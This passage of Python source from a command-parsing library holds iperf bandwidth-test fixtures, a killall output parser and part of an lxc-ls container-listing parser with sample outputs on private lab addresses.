'Lost_vs_Total_Datagrams': '0/ 850 (0%)',
'Transfer Raw': '1.19 MBytes',
'Transfer': 1247805},
{'Bandwidth Raw': '10.0 Mbits/sec',
'Bandwidth': 1250000,
'Interval': '8.0- 9.0 sec',
'Jitter': '1.841 ms',
'Lost_vs_Total_Datagrams': '0/ 850 (0%)',
'Transfer Raw': '1.19 MBytes',
'Transfer': 1247805},
{'Bandwidth Raw': '10.0 Mbits/sec',
'Bandwidth': 1250000,
'Interval': '9.0-10.0 sec',
'Jitter': '1.801 ms',
'Lost_vs_Total_Datagrams': '0/ 851 (0%)',
'Transfer Raw': '1.19 MBytes',
'Transfer': 1247805},
{'Bandwidth Raw': '9.86 Mbits/sec',
'Bandwidth': 1232500,
'Interval': '0.0-10.0 sec',
'Jitter': '2.618 ms',
'Lost_vs_Total_Datagrams': '9/ 8409 (0.11%)',
'Transfer Raw': '11.8 MBytes',
'Transfer': 12373196}]},
'INFO': ['Server listening on UDP port 5001', 'Receiving 1470 byte datagrams',
'UDP buffer size: 8.00 KByte (default)']}
COMMAND_OUTPUT_bidirectional_udp_client = """
ute@IAV-KRA-TL160:~$ iperf -c 192.168.0.12 -u -p 5016 -f k -i 1.0 -t 6.0 --dualtest -b 5000.0k
------------------------------------------------------------
Server listening on UDP port 5016
Receiving 1470 byte datagrams
UDP buffer size: 1024 KByte (default)
------------------------------------------------------------
------------------------------------------------------------
Client connecting to 192.168.0.12, UDP port 5016
Sending 1470 byte datagrams, IPG target: 2352.00 us (kalman adjust)
UDP buffer size: 1024 KByte (default)
------------------------------------------------------------
[ 4] local 192.168.0.10 port 56262 connected with 192.168.0.12 port 5016
[ 3] local 192.168.0.10 port 5016 connected with 192.168.0.12 port 47384
[ ID] Interval Transfer Bandwidth
[ 4] 0.0- 1.0 sec 613 KBytes 5022 Kbits/sec
[ 3] 0.0- 1.0 sec 612 KBytes 5010 Kbits/sec 0.011 ms 0/ 426 (0%)
[ 4] 1.0- 2.0 sec 610 KBytes 4998 Kbits/sec
[ 3] 1.0- 2.0 sec 610 KBytes 4998 Kbits/sec 0.012 ms 0/ 425 (0%)
[ 4] 2.0- 3.0 sec 610 KBytes 4998 Kbits/sec
[ 3] 2.0- 3.0 sec 610 KBytes 4998 Kbits/sec 0.017 ms 0/ 425 (0%)
[ 4] 3.0- 4.0 sec 610 KBytes 4998 Kbits/sec
[ 3] 3.0- 4.0 sec 610 KBytes 4998 Kbits/sec 0.019 ms 0/ 425 (0%)
[ 4] 4.0- 5.0 sec 610 KBytes 4998 Kbits/sec
[ 3] 4.0- 5.0 sec 610 KBytes 4998 Kbits/sec 0.014 ms 0/ 425 (0%)
[ 4] 5.0- 6.0 sec 610 KBytes 4998 Kbits/sec
[ 4] 0.0- 6.0 sec 3664 KBytes 5000 Kbits/sec
[ 4] Sent 2552 datagrams
[ 3] 5.0- 6.0 sec 612 KBytes 5010 Kbits/sec 0.017 ms 0/ 426 (0%)
[ 3] 0.0- 6.0 sec 3664 KBytes 5000 Kbits/sec 0.017 ms 0/ 2552 (0%)
[ 4] Server Report:
[ 4] 0.0- 6.0 sec 3664 KBytes 5000 Kbits/sec 0.017 ms 0/ 2552 (0%)
ute@IAV-KRA-TL160:~$"""
COMMAND_KWARGS_bidirectional_udp_client = {
'options': '-c 192.168.0.12 -u -p 5016 -f k -i 1.0 -t 6.0 --dualtest -b 5000.0k'
}
COMMAND_RESULT_bidirectional_udp_client = {
'CONNECTIONS': {
'local 192.168.0.10 port 56262 connected with 192.168.0.12 port 5016': [{'Transfer': 627712,
'Bandwidth': 627750,
'Transfer Raw': '613 KBytes',
'Bandwidth Raw': '5022 Kbits/sec',
'Interval': '0.0- 1.0 sec'},
{'Transfer': 624640,
'Bandwidth': 624750,
'Transfer Raw': '610 KBytes',
'Bandwidth Raw': '4998 Kbits/sec',
'Interval': '1.0- 2.0 sec'},
{'Transfer': 624640,
'Bandwidth': 624750,
'Transfer Raw': '610 KBytes',
'Bandwidth Raw': '4998 Kbits/sec',
'Interval': '2.0- 3.0 sec'},
{'Transfer': 624640,
'Bandwidth': 624750,
'Transfer Raw': '610 KBytes',
'Bandwidth Raw': '4998 Kbits/sec',
'Interval': '3.0- 4.0 sec'},
{'Transfer': 624640,
'Bandwidth': 624750,
'Transfer Raw': '610 KBytes',
'Bandwidth Raw': '4998 Kbits/sec',
'Interval': '4.0- 5.0 sec'},
{'Transfer': 624640,
'Bandwidth': 624750,
'Transfer Raw': '610 KBytes',
'Bandwidth Raw': '4998 Kbits/sec',
'Interval': '5.0- 6.0 sec'},
{'Transfer': 3751936,
'Bandwidth': 625000,
'Transfer Raw': '3664 KBytes',
'Bandwidth Raw': '5000 Kbits/sec',
'Interval': '0.0- 6.0 sec'},
{'Transfer Raw': '3664 KBytes',
'Jitter': '0.017 ms',
'Transfer': 3751936,
'Interval': '0.0- 6.0 sec',
'Bandwidth': 625000,
'Lost_vs_Total_Datagrams': '0/ 2552 (0%)',
'Bandwidth Raw': '5000 Kbits/sec'}],
'local 192.168.0.10 port 5016 connected with 192.168.0.12 port 47384': [{'Transfer Raw': '612 KBytes',
'Jitter': '0.011 ms',
'Transfer': 626688,
'Interval': '0.0- 1.0 sec',
'Bandwidth': 626250,
'Lost_vs_Total_Datagrams': '0/ 426 (0%)',
'Bandwidth Raw': '5010 Kbits/sec'},
{'Transfer Raw': '610 KBytes',
'Jitter': '0.012 ms',
'Transfer': 624640,
'Interval': '1.0- 2.0 sec',
'Bandwidth': 624750,
'Lost_vs_Total_Datagrams': '0/ 425 (0%)',
'Bandwidth Raw': '4998 Kbits/sec'},
{'Transfer Raw': '610 KBytes',
'Jitter': '0.017 ms',
'Transfer': 624640,
'Interval': '2.0- 3.0 sec',
'Bandwidth': 624750,
'Lost_vs_Total_Datagrams': '0/ 425 (0%)',
'Bandwidth Raw': '4998 Kbits/sec'},
{'Transfer Raw': '610 KBytes',
'Jitter': '0.019 ms',
'Transfer': 624640,
'Interval': '3.0- 4.0 sec',
'Bandwidth': 624750,
'Lost_vs_Total_Datagrams': '0/ 425 (0%)',
'Bandwidth Raw': '4998 Kbits/sec'},
{'Transfer Raw': '610 KBytes',
'Jitter': '0.014 ms',
'Transfer': 624640,
'Interval': '4.0- 5.0 sec',
'Bandwidth': 624750,
'Lost_vs_Total_Datagrams': '0/ 425 (0%)',
'Bandwidth Raw': '4998 Kbits/sec'},
{'Transfer Raw': '612 KBytes',
'Jitter': '0.017 ms',
'Transfer': 626688,
'Interval': '5.0- 6.0 sec',
'Bandwidth': 626250,
'Lost_vs_Total_Datagrams': '0/ 426 (0%)',
'Bandwidth Raw': '5010 Kbits/sec'},
{'Transfer Raw': '3664 KBytes',
'Jitter': '0.017 ms',
'Transfer': 3751936,
'Interval': '0.0- 6.0 sec',
'Bandwidth': 625000,
'Lost_vs_Total_Datagrams': '0/ 2552 (0%)',
'Bandwidth Raw': '5000 Kbits/sec'}]},
'INFO': ['Server listening on UDP port 5016', 'Receiving 1470 byte datagrams',
'UDP buffer size: 1024 KByte (default)',
'Client connecting to 192.168.0.12, UDP port 5016',
'Sending 1470 byte datagrams, IPG target: 2352.00 us (kalman adjust)',
'UDP buffer size: 1024 KByte (default)',
'[ 4] Sent 2552 datagrams',
'[ 4] Server Report:']}
COMMAND_OUTPUT_bidirectional_udp_server = """
ute@2-7-TL166:~$ iperf -s -u -p 5016 -f k -i 1.0
------------------------------------------------------------
Server listening on UDP port 5016
Receiving 1470 byte datagrams
UDP buffer size: 1024 KByte (default)
------------------------------------------------------------
[ 3] local 192.168.0.12 port 5016 connected with 192.168.0.10 port 56262
------------------------------------------------------------
Client connecting to 192.168.0.10, UDP port 5016
Sending 1470 byte datagrams, IPG target: 2352.00 us (kalman adjust)
UDP buffer size: 1024 KByte (default)
------------------------------------------------------------
[ 5] local 192.168.0.12 port 47384 connected with 192.168.0.10 port 5016
[ ID] Interval Transfer Bandwidth Jitter Lost/Total Datagrams
[ 3] 0.0- 1.0 sec 612 KBytes 5010 Kbits/sec 0.022 ms 0/ 426 (0%)
[ 5] 0.0- 1.0 sec 613 KBytes 5022 Kbits/sec
[ 3] 1.0- 2.0 sec 610 KBytes 4998 Kbits/sec 0.016 ms 0/ 425 (0%)
[ 5] 1.0- 2.0 sec 610 KBytes 4998 Kbits/sec
[ 3] 2.0- 3.0 sec 610 KBytes 4998 Kbits/sec 0.021 ms 0/ 425 (0%)
[ 5] 2.0- 3.0 sec 610 KBytes 4998 Kbits/sec
[ 3] 3.0- 4.0 sec 610 KBytes 4998 Kbits/sec 0.009 ms 0/ 425 (0%)
[ 5] 3.0- 4.0 sec 610 KBytes 4998 Kbits/sec
[ 3] 4.0- 5.0 sec 612 KBytes 5010 Kbits/sec 0.014 ms 0/ 426 (0%)
[ 5] 4.0- 5.0 sec 610 KBytes 4998 Kbits/sec
[ 3] 5.0- 6.0 sec 610 KBytes 4998 Kbits/sec 0.018 ms 0/ 425 (0%)
[ 3] 0.0- 6.0 sec 3664 KBytes 5000 Kbits/sec 0.018 ms 0/ 2552 (0%)
[ 5] 5.0- 6.0 sec 610 KBytes 4998 Kbits/sec
[ 5] 0.0- 6.0 sec 3664 KBytes 5000 Kbits/sec
[ 5] Sent 2552 datagrams
[ 5] Server Report:
[ 5] 0.0- 6.0 sec 3664 KBytes 5000 Kbits/sec 0.017 ms 0/ 2552 (0%)
ute@2-7-TL166:~$"""
COMMAND_KWARGS_bidirectional_udp_server = {
'options': '-u -p 5016 -f k -i 1.0'
}
COMMAND_RESULT_bidirectional_udp_server = {
'CONNECTIONS': {
'local 192.168.0.12 port 47384 connected with 192.168.0.10 port 5016': [{'Transfer': 627712,
'Bandwidth': 627750,
'Transfer Raw': '613 KBytes',
'Bandwidth Raw': '5022 Kbits/sec',
'Interval': '0.0- 1.0 sec'},
{'Transfer': 624640,
'Bandwidth': 624750,
'Transfer Raw': '610 KBytes',
'Bandwidth Raw': '4998 Kbits/sec',
'Interval': '1.0- 2.0 sec'},
{'Transfer': 624640,
'Bandwidth': 624750,
'Transfer Raw': '610 KBytes',
'Bandwidth Raw': '4998 Kbits/sec',
'Interval': '2.0- 3.0 sec'},
{'Transfer': 624640,
'Bandwidth': 624750,
'Transfer Raw': '610 KBytes',
'Bandwidth Raw': '4998 Kbits/sec',
'Interval': '3.0- 4.0 sec'},
{'Transfer': 624640,
'Bandwidth': 624750,
'Transfer Raw': '610 KBytes',
'Bandwidth Raw': '4998 Kbits/sec',
'Interval': '4.0- 5.0 sec'},
{'Transfer': 624640,
'Bandwidth': 624750,
'Transfer Raw': '610 KBytes',
'Bandwidth Raw': '4998 Kbits/sec',
'Interval': '5.0- 6.0 sec'},
{'Transfer': 3751936,
'Bandwidth': 625000,
'Transfer Raw': '3664 KBytes',
'Bandwidth Raw': '5000 Kbits/sec',
'Interval': '0.0- 6.0 sec'},
{'Transfer Raw': '3664 KBytes',
'Jitter': '0.017 ms',
'Transfer': 3751936,
'Interval': '0.0- 6.0 sec',
'Bandwidth': 625000,
'Lost_vs_Total_Datagrams': '0/ 2552 (0%)',
'Bandwidth Raw': '5000 Kbits/sec'}],
'local 192.168.0.12 port 5016 connected with 192.168.0.10 port 56262': [{'Transfer Raw': '612 KBytes',
'Jitter': '0.022 ms',
'Transfer': 626688,
'Interval': '0.0- 1.0 sec',
'Bandwidth': 626250,
'Lost_vs_Total_Datagrams': '0/ 426 (0%)',
'Bandwidth Raw': '5010 Kbits/sec'},
{'Transfer Raw': '610 KBytes',
'Jitter': '0.016 ms',
'Transfer': 624640,
'Interval': '1.0- 2.0 sec',
'Bandwidth': 624750,
'Lost_vs_Total_Datagrams': '0/ 425 (0%)',
'Bandwidth Raw': '4998 Kbits/sec'},
{'Transfer Raw': '610 KBytes',
'Jitter': '0.021 ms',
'Transfer': 624640,
'Interval': '2.0- 3.0 sec',
'Bandwidth': 624750,
'Lost_vs_Total_Datagrams': '0/ 425 (0%)',
'Bandwidth Raw': '4998 Kbits/sec'},
{'Transfer Raw': '610 KBytes',
'Jitter': '0.009 ms',
'Transfer': 624640,
'Interval': '3.0- 4.0 sec',
'Bandwidth': 624750,
'Lost_vs_Total_Datagrams': '0/ 425 (0%)',
'Bandwidth Raw': '4998 Kbits/sec'},
{'Transfer Raw': '612 KBytes',
'Jitter': '0.014 ms',
'Transfer': 626688,
'Interval': '4.0- 5.0 sec',
'Bandwidth': 626250,
'Lost_vs_Total_Datagrams': '0/ 426 (0%)',
'Bandwidth Raw': '5010 Kbits/sec'},
{'Transfer Raw': '610 KBytes',
'Jitter': '0.018 ms',
'Transfer': 624640,
'Interval': '5.0- 6.0 sec',
'Bandwidth': 624750,
'Lost_vs_Total_Datagrams': '0/ 425 (0%)',
'Bandwidth Raw': '4998 Kbits/sec'},
{'Transfer Raw': '3664 KBytes',
'Jitter': '0.018 ms',
'Transfer': 3751936,
'Interval': '0.0- 6.0 sec',
'Bandwidth': 625000,
'Lost_vs_Total_Datagrams': '0/ 2552 (0%)',
'Bandwidth Raw': '5000 Kbits/sec'}]},
'INFO': ['Server listening on UDP port 5016',
'Receiving 1470 byte datagrams',
'UDP buffer size: 1024 KByte (default)',
'Client connecting to 192.168.0.10, UDP port 5016',
'Sending 1470 byte datagrams, IPG target: 2352.00 us (kalman adjust)',
'UDP buffer size: 1024 KByte (default)',
'[ 5] Sent 2552 datagrams',
'[ 5] Server Report:']}
COMMAND_OUTPUT_multiple_connections = """
xyz@debian:~$ iperf -c 192.168.0.100 -P 20
------------------------------------------------------------
Client connecting to 192.168.0.100, TCP port 5001
TCP window size: 16.0 KByte (default)
------------------------------------------------------------
[ 15] local 192.168.0.102 port 57258 connected with 192.168.0.100 port 5001
[ 3] local 192.168.0.102 port 57246 connected with 192.168.0.100 port 5001
[ 4] local 192.168.0.102 port 57247 connected with 192.168.0.100 port 5001
[ 5] local 192.168.0.102 port 57248 connected with 192.168.0.100 port 5001
[ 7] local 192.168.0.102 port 57250 connected with 192.168.0.100 port 5001
[ 6] local 192.168.0.102 port 57249 connected with 192.168.0.100 port 5001
[ 10] local 192.168.0.102 port 57253 connected with 192.168.0.100 port 5001
[ 8] local 192.168.0.102 port 57251 connected with 192.168.0.100 port 5001
[ 9] local 192.168.0.102 port 57252 connected with 192.168.0.100 port 5001
[ 16] local 192.168.0.102 port 57259 connected with 192.168.0.100 port 5001
[ 19] local 192.168.0.102 port 57261 connected with 192.168.0.100 port 5001
[ 18] local 192.168.0.102 port 57260 connected with 192.168.0.100 port 5001
[ 20] local 192.168.0.102 port 57262 connected with 192.168.0.100 port 5001
[ 17] local 192.168.0.102 port 57263 connected with 192.168.0.100 port 5001
[ 21] local 192.168.0.102 port 57264 connected with 192.168.0.100 port 5001
[ 11] local 192.168.0.102 port 57254 connected with 192.168.0.100 port 5001
[ 12] local 192.168.0.102 port 57255 connected with 192.168.0.100 port 5001
[ 13] local 192.168.0.102 port 57256 connected with 192.168.0.100 port 5001
[ 14] local 192.168.0.102 port 57257 connected with 192.168.0.100 port 5001
[ 22] local 192.168.0.102 port 57265 connected with 192.168.0.100 port 5001
[ ID] Interval Transfer Bandwidth
[ 8] 0.0-10.6 sec 16.6 MBytes 13.1 Mbits/sec
[ 16] 0.0-10.6 sec 16.6 MBytes 13.1 Mbits/sec
[ 18] 0.0-10.6 sec 16.5 MBytes 13.1 Mbits/sec
[ 17] 0.0-10.7 sec 16.6 MBytes 13.0 Mbits/sec
[ 21] 0.0-10.7 sec 15.6 MBytes 12.3 Mbits/sec
[ 12] 0.0-10.7 sec 17.5 MBytes 13.7 Mbits/sec
[ 22] 0.0-10.7 sec 16.6 MBytes 13.0 Mbits/sec
[ 15] 0.0-10.8 sec 17.8 MBytes 13.8 Mbits/sec
[ 3] 0.0-10.7 sec 18.5 MBytes 14.5 Mbits/sec
[ 4] 0.0-10.8 sec 18.1 MBytes 14.1 Mbits/sec
[ 5] 0.0-10.7 sec 17.6 MBytes 13.9 Mbits/sec
[ 7] 0.0-10.8 sec 18.4 MBytes 14.3 Mbits/sec
[ 6] 0.0-10.8 sec 17.0 MBytes 13.2 Mbits/sec
[ 10] 0.0-10.8 sec 16.8 MBytes 13.1 Mbits/sec
[ 9] 0.0-10.8 sec 16.8 MBytes 13.0 Mbits/sec
[ 19] 0.0-10.6 sec 16.5 MBytes 13.0 Mbits/sec
[ 20] 0.0-10.7 sec 16.5 MBytes 12.9 Mbits/sec
[ 11] 0.0-10.7 sec 18.0 MBytes 14.0 Mbits/sec
[ 13] 0.0-10.7 sec 17.8 MBytes 13.9 Mbits/sec
[ 14] 0.0-10.8 sec 18.2 MBytes 14.1 Mbits/sec
[SUM] 0.0-10.8 sec 344 MBytes 266 Mbits/sec
xyz@debian:~$"""
COMMAND_KWARGS_multiple_connections = {
'options': '-c 192.168.0.100 -P 20'
}
COMMAND_RESULT_multiple_connections = {
'CONNECTIONS': {
'local 192.168.0.102 port 57246 connected with 192.168.0.100 port 5001': [{'Bandwidth Raw': '14.5 Mbits/sec',
'Bandwidth': 1812500,
'Interval': '0.0-10.7 sec',
'Transfer Raw': '18.5 MBytes',
'Transfer': 19398656}],
'local 192.168.0.102 port 57247 connected with 192.168.0.100 port 5001': [{'Bandwidth Raw': '14.1 Mbits/sec',
'Bandwidth': 1762500,
'Interval': '0.0-10.8 sec',
'Transfer Raw': '18.1 MBytes',
'Transfer': 18979225}],
'local 192.168.0.102 port 57248 connected with 192.168.0.100 port 5001': [{'Bandwidth Raw': '13.9 Mbits/sec',
'Bandwidth': 1737500,
'Interval': '0.0-10.7 sec',
'Transfer Raw': '17.6 MBytes',
'Transfer': 18454937}],
'local 192.168.0.102 port 57249 connected with 192.168.0.100 port 5001': [{'Bandwidth Raw': '13.2 Mbits/sec',
'Bandwidth': 1650000,
'Interval': '0.0-10.8 sec',
'Transfer Raw': '17.0 MBytes',
'Transfer': 17825792}],
'local 192.168.0.102 port 57250 connected with 192.168.0.100 port 5001': [{'Bandwidth Raw': '14.3 Mbits/sec',
'Bandwidth': 1787500,
'Interval': '0.0-10.8 sec',
'Transfer Raw': '18.4 MBytes',
'Transfer': 19293798}],
'local 192.168.0.102 port 57251 connected with 192.168.0.100 port 5001': [{'Bandwidth Raw': '13.1 Mbits/sec',
'Bandwidth': 1637500,
'Interval': '0.0-10.6 sec',
'Transfer Raw': '16.6 MBytes',
'Transfer': 17406361}],
'local 192.168.0.102 port 57252 connected with 192.168.0.100 port 5001': [{'Bandwidth Raw': '13.0 Mbits/sec',
'Bandwidth': 1625000,
'Interval': '0.0-10.8 sec',
'Transfer Raw': '16.8 MBytes',
'Transfer': 17616076}],
'local 192.168.0.102 port 57253 connected with 192.168.0.100 port 5001': [{'Bandwidth Raw': '13.1 Mbits/sec',
'Bandwidth': 1637500,
'Interval': '0.0-10.8 sec',
'Transfer Raw': '16.8 MBytes',
'Transfer': 17616076}],
'local 192.168.0.102 port 57254 connected with 192.168.0.100 port 5001': [{'Bandwidth Raw': '14.0 Mbits/sec',
'Bandwidth': 1750000,
'Interval': '0.0-10.7 sec',
'Transfer Raw': '18.0 MBytes',
'Transfer': 18874368}],
'local 192.168.0.102 port 57255 connected with 192.168.0.100 port 5001': [{'Bandwidth Raw': '13.7 Mbits/sec',
'Bandwidth': 1712500,
'Interval': '0.0-10.7 sec',
'Transfer Raw': '17.5 MBytes',
'Transfer': 18350080}],
'local 192.168.0.102 port 57256 connected with 192.168.0.100 port 5001': [{'Bandwidth Raw': '13.9 Mbits/sec',
'Bandwidth': 1737500,
'Interval': '0.0-10.7 sec',
'Transfer Raw': '17.8 MBytes',
'Transfer': 18664652}],
'local 192.168.0.102 port 57257 connected with 192.168.0.100 port 5001': [{'Bandwidth Raw': '14.1 Mbits/sec',
'Bandwidth': 1762500,
'Interval': '0.0-10.8 sec',
'Transfer Raw': '18.2 MBytes',
'Transfer': 19084083}],
'local 192.168.0.102 port 57258 connected with 192.168.0.100 port 5001': [{'Bandwidth Raw': '13.8 Mbits/sec',
'Bandwidth': 1725000,
'Interval': '0.0-10.8 sec',
'Transfer Raw': '17.8 MBytes',
'Transfer': 18664652}],
'local 192.168.0.102 port 57259 connected with 192.168.0.100 port 5001': [{'Bandwidth Raw': '13.1 Mbits/sec',
'Bandwidth': 1637500,
'Interval': '0.0-10.6 sec',
'Transfer Raw': '16.6 MBytes',
'Transfer': 17406361}],
'local 192.168.0.102 port 57260 connected with 192.168.0.100 port 5001': [{'Bandwidth Raw': '13.1 Mbits/sec',
'Bandwidth': 1637500,
'Interval': '0.0-10.6 sec',
'Transfer Raw': '16.5 MBytes',
'Transfer': 17301504}],
'local 192.168.0.102 port 57261 connected with 192.168.0.100 port 5001': [{'Bandwidth Raw': '13.0 Mbits/sec',
'Bandwidth': 1625000,
'Interval': '0.0-10.6 sec',
'Transfer Raw': '16.5 MBytes',
'Transfer': 17301504}],
'local 192.168.0.102 port 57262 connected with 192.168.0.100 port 5001': [{'Bandwidth Raw': '12.9 Mbits/sec',
'Bandwidth': 1612500,
'Interval': '0.0-10.7 sec',
'Transfer Raw': '16.5 MBytes',
'Transfer': 17301504}],
'local 192.168.0.102 port 57263 connected with 192.168.0.100 port 5001': [{'Bandwidth Raw': '13.0 Mbits/sec',
'Bandwidth': 1625000,
'Interval': '0.0-10.7 sec',
'Transfer Raw': '16.6 MBytes',
'Transfer': 17406361}],
'local 192.168.0.102 port 57264 connected with 192.168.0.100 port 5001': [{'Bandwidth Raw': '12.3 Mbits/sec',
'Bandwidth': 1537500,
'Interval': '0.0-10.7 sec',
'Transfer Raw': '15.6 MBytes',
'Transfer': 16357785}],
'local 192.168.0.102 port 57265 connected with 192.168.0.100 port 5001': [{'Bandwidth Raw': '13.0 Mbits/sec',
'Bandwidth': 1625000,
'Interval': '0.0-10.7 sec',
'Transfer Raw': '16.6 MBytes',
'Transfer': 17406361}]},
'INFO': ['Client connecting to 192.168.0.100, TCP port 5001', 'TCP window size: 16.0 KByte (default)',
'[SUM] 0.0-10.8 sec 344 MBytes 266 Mbits/sec']}
```
#### File: cmd/unix/killall.py
```python
__author__ = '<NAME>'
__copyright__ = 'Copyright (C) 2018, Nokia'
__email__ = '<EMAIL>'
import re
from moler.cmd.unix.genericunix import GenericUnixCommand
from moler.exceptions import CommandFailure
from moler.exceptions import ParsingDone
class Killall(GenericUnixCommand):
def __init__(self, connection, name, is_verbose=False, prompt=None, newline_chars=None, runner=None):
super(Killall, self).__init__(connection=connection, prompt=prompt, newline_chars=newline_chars,
runner=runner)
self.is_verbose = is_verbose
self.name = name
self.ret_required = False
def build_command_string(self):
if self.is_verbose:
cmd = "{} {} {}".format("killall", "-v", self.name)
else:
cmd = "{} {}".format("killall", self.name)
return cmd
def on_new_line(self, line, is_full_line):
if is_full_line:
try:
self._parse_no_permit(line)
self._parse_killall_verbose(line)
except ParsingDone:
pass
return super(Killall, self).on_new_line(line, is_full_line)
def _parse_no_permit(self, line):
if self._regex_helper.search(r'(Operation not permitted)', line):
self.set_exception(CommandFailure(self, "ERROR: {}".format(self._regex_helper.group(1))))
raise ParsingDone
_re_killall = re.compile(r"Killed (?P<Name>[^\(]+)\((?P<Pid>\d+)\) with signal")
def _parse_killall_verbose(self, line):
if self.is_verbose:
if self._regex_helper.search_compiled(Killall._re_killall, line):
if "Detail" not in self.current_ret:
self.current_ret["Detail"] = dict()
pid = self._regex_helper.group("Pid")
self.current_ret["Detail"][pid] = self._regex_helper.group("Name")
raise ParsingDone
COMMAND_OUTPUT_no_verbose = """
Pclinux90:~ # killall iperf
Pclinux90:~ # """
COMMAND_KWARGS_no_verbose = {"name": "iperf"}
COMMAND_RESULT_no_verbose = {
}
COMMAND_OUTPUT_no_process = """
PClinux110:/home/runner # killall tshark
tshark: no process found
PClinux110:/home/runner #"""
COMMAND_KWARGS_no_process = {"name": "tshark"}
COMMAND_RESULT_no_process = {
}
COMMAND_OUTPUT_verbose = """
Pclinux90:~ # killall -v iperf
Killed iperf(15054) with signal 15
Pclinux90:~ # """
COMMAND_KWARGS_verbose = {
"name": "iperf",
"is_verbose": True
}
COMMAND_RESULT_verbose = {
"Detail": {"15054": "iperf"}
}
```
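The `Detail` dictionary in the verbose result above is produced solely by the `Killall._re_killall` pattern. As a quick, self-contained illustration (plain `re`, no Moler connection involved), the same pattern can be exercised against the sample output line:

```python
import re

# same pattern as Killall._re_killall above
_re_killall = re.compile(r"Killed (?P<Name>[^\(]+)\((?P<Pid>\d+)\) with signal")

detail = {}
for line in ["Killed iperf(15054) with signal 15"]:
    match = _re_killall.search(line)
    if match:
        detail[match.group("Pid")] = match.group("Name")  # keyed by PID, like current_ret["Detail"]

print(detail)  # {'15054': 'iperf'}
```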
#### File: cmd/unix/lxc_ls.py
```python
__author__ = '<NAME>, <NAME>'
__copyright__ = 'Copyright (C) 2019-2020, Nokia'
__email__ = '<EMAIL>, <EMAIL>'
from moler.cmd.unix.genericunix import GenericUnixCommand
from moler.exceptions import CommandFailure
from moler.exceptions import ParsingDone
import re
class LxcLs(GenericUnixCommand):
"""Lxcls command class."""
def __init__(self, connection, prompt=None, newline_chars=None, runner=None, options=None):
"""
Lxcls command lists containers.
:param connection: moler connection to device, terminal when command is executed.
:param prompt: expected prompt sending by device after command execution
:param newline_chars: Characters to split lines
:param runner: Runner to run command
:param options: command options as string
"""
super(LxcLs, self).__init__(connection=connection, prompt=prompt, newline_chars=newline_chars, runner=runner)
self.options = options
self.current_ret["RESULT"] = list()
self._headers = list()
def build_command_string(self):
"""
Build command string from parameters passed to object.
:return: String representation of command to send over connection to device.
"""
cmd = "lxc-ls"
if self.options:
cmd = "{} {}".format(cmd, self.options)
return cmd
def on_new_line(self, line, is_full_line):
"""
Put your parsing code here.
:param line: Line to process, can be only part of line. New line chars are removed from line.
:param is_full_line: True if line had new line chars, False otherwise
:return: None
"""
if is_full_line:
try:
self._command_error(line)
self._parse_table_headers(line)
self._parse_table_row(line)
self._parse_line(line)
except ParsingDone:
pass
return super(LxcLs, self).on_new_line(line, is_full_line)
_re_command_error = re.compile(r'(?P<ERROR>lxc-ls:\s+.+)', re.I)
def _command_error(self, line):
if self._regex_helper.search_compiled(LxcLs._re_command_error, line):
self.set_exception(CommandFailure(self, "ERROR: {}".format(self._regex_helper.group("ERROR"))))
_re_headers = re.compile(r"NAME\s+STATE\s+AUTOSTART\s+GROUPS\s+IPV4\s+IPV6", re.I)
def _parse_table_headers(self, line):
if self._regex_helper.search_compiled(LxcLs._re_headers, line):
self._headers = ['Name', 'State', 'Autostart', 'Groups', 'IPv4', 'IPv6']
raise ParsingDone
def _parse_table_row(self, line):
if self._headers:
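            # The fancy (-f) output separates columns with runs of whitespace, while the
            # IPV4 column itself holds a ", "-separated address list.  Splitting on
            # r'([^,])\s+' consumes whitespace only when the preceding character is not a
            # comma and keeps that character as a captured element, so the pairwise join
            # below re-attaches it to its column while address lists stay in one field.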
values = re.split(r'([^,])\s+', line)
striped_values = list()
values_size = len(values)
i = 0
while i < values_size - 1:
striped_values.append(values[i] + values[i + 1])
i += 2
if values_size % 2 != 0:
striped_values.append(values[-1])
self.current_ret["RESULT"].append(dict(zip(self._headers, striped_values)))
raise ParsingDone
def _parse_line(self, line):
self.current_ret["RESULT"].append(line.split())
raise ParsingDone
COMMAND_OUTPUT = """root@server~ >lxc-ls
0xe000 0xe001 0xe002 0xe003 0xe004 0xe009 0xe00a 0xe00b 0xe00c 0xe00d 0xe019
root@server~ >"""
COMMAND_KWARGS = {}
COMMAND_RESULT = {
"RESULT": [['0xe000', '0xe001', '0xe002', '0xe003', '0xe004', '0xe009', '0xe00a', '0xe00b', '0xe00c', '0xe00d',
'0xe019']]
}
COMMAND_OUTPUT_2 = """
root@server~ >lxc-ls -f
NAME STATE AUTOSTART GROUPS IPV4 IPV6
0xe000 RUNNING 0 - 10.1.1.1, 10.1.1.2, 10.83.182.49, 192.168.2.60, 192.168.253.1, 192.168.253.16, 192.168.253.193, 192.168.253.217, 192.168.253.224, 192.168.253.225, 192.168.253.226, 192.168.253.227, 192.168.253.228, 192.168.253.233, 192.168.253.234, 192.168.253.235, 192.168.253.236, 192.168.253.237, 192.168.255.1, 192.168.255.129, 192.168.255.253 -
0xe001 RUNNING 0 - 10.1.1.1, 10.1.1.2, 10.83.182.49, 192.168.2.60, 192.168.253.1, 192.168.253.16, 192.168.253.193, 192.168.253.217, 192.168.253.224, 192.168.253.225, 192.168.253.226, 192.168.253.227, 192.168.253.228, 192.168.253.233, 192.168.253.234, 192.168.253.235, 192.168.253.236, 192.168.253.237, 192.168.255.1, 192.168.255.129, 192.168.255.253 -
0xe002 RUNNING 0 - 10.1.1.1, 10.1.1.2, 10.83.182.49, 192.168.2.60, 192.168.253.1, 192.168.253.16, 192.168.253.193, 192.168.253.217, 192.168.253.224, 192.168.253.225, 192.168.253.226, 192.168.253.227, 192.168.253.228, 192.168.253.233, 192.168.253.234, 192.168.253.235, 192.168.253.236, 192.168.253.237, 192.168.255.1, 192.168.255.129, 192.168.255.253 -
0xe003 RUNNING 0 - 10.1.1.1, 10.1.1.2, 10.83.182.49, 192.168.2.60, 192.168.253.1, 192.168.253.16, 192.168.253.193, 192.168.253.217, 192.168.253.224, 192.168.253.225, 192.168.253.226, 192.168.253.227, 192.168.253.228, 192.168.253.233, 192.168.253.234, 192.168.253.235, 192.168.253.236, 192.168.253.237, 192.168.255.1, 192.168.255.129, 192.168.255.253 -
